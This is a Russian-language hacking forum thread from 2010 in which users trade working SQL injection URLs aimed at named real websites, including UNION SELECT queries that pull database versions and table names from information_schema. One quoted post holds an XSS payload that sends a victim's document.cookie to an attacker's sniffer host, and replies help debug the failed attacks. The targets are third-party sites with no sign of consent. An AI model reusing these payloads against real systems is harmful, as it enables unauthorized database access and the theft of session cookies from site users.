HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.07.2010, 05:06
zlo12
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
Провел на форуме:
3054717

Репутация: 170
По умолчанию

тупой вопрос, раньше их пропускал, а ща задумался.

Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
 
Ответить с цитированием

  #2  
Старый 12.07.2010, 05:11
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от zlo12  
тупой вопрос, раньше их пропускал, а ща задумался.
Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
смотря какой фильтр, все зависит от кода
 
Ответить с цитированием

  #3  
Старый 12.07.2010, 06:15
happygirl
Новичок
Регистрация: 10.07.2010
Сообщений: 8
Провел на форуме:
2597

Репутация: 0
По умолчанию

http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(version() ),0x71),0x71),4,5--+

->5.0.91-community

http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(table_nam e),0x71),0x71),4,5 %20from%20information_schema.tables%20where%20tabl e_schema='jain4_jain4jain' limit 1,1--+

Не обуви стол?
 
Ответить с цитированием

  #4  
Старый 12.07.2010, 06:41
zlo12
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
Провел на форуме:
3054717

Репутация: 170
По умолчанию

что тут можно сделать? 9 алертов вылезает.

http://www.unsigned.com/scriptalertscript
 
Ответить с цитированием

  #5  
Старый 12.07.2010, 10:26
Boa
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694

Репутация: 5
По умолчанию

Цитата:
Сообщение от R0nin  
Вот например:
Код:
http://*.ru/archive.php?year=img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"
Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло

Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.
 
Ответить с цитированием

  #6  
Старый 12.07.2010, 11:51
Decoy
Новичок
Регистрация: 04.12.2005
Сообщений: 6
Провел на форуме:
27773

Репутация: 1
По умолчанию

Dare

/showpost.php?p=2243791&postcount=14265

Попробовал

Код:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+from+information_schema.columns+where+0x636F6C756D6E5F6E616D653D75736572--+
Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?
 
Ответить с цитированием

  #7  
Старый 12.07.2010, 12:11
Dare
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979

Репутация: 53
По умолчанию

Цитата:
Сообщение от Decoy  
Dare
/showpost.php?p=2243791&postcount=14265
Попробовал
Код:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+from+information_schema.columns+where+0x636F6C756D6E5F6E616D653D75736572--+
Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?
Мб что просто нет к ней доступа (прав не хватает), но ты же грил что некоторые таблицы читал?

Без линка увы ни чем помочь не смогу, если что стучи в асю или ПМ

Последний пост на эту тему!
 
Ответить с цитированием

  #8  
Старый 12.07.2010, 12:32
Decoy
Новичок
Регистрация: 04.12.2005
Сообщений: 6
Провел на форуме:
27773

Репутация: 1
По умолчанию

Dare

Ссылка выше.

Я думаю, если проблема в правах доступа, то сайт выдал бы ошибку (из-за нехватки аргументов), как если сделать select 1,2,3,4 вместо select 1,2,3,4,5.

PS Постучал по ICQ.
 
Ответить с цитированием

  #9  
Старый 12.07.2010, 14:37
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Boa  
Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло
Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.
Надеюсь там есть уязвимость XSS-injection ?

Если что открой страницу кода и посмотри как он там передался.
 
Ответить с цитированием

  #10  
Старый 12.07.2010, 18:59
haito
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441

Репутация: 0
По умолчанию

почему это не показывают, введенный номер?

http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+

http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.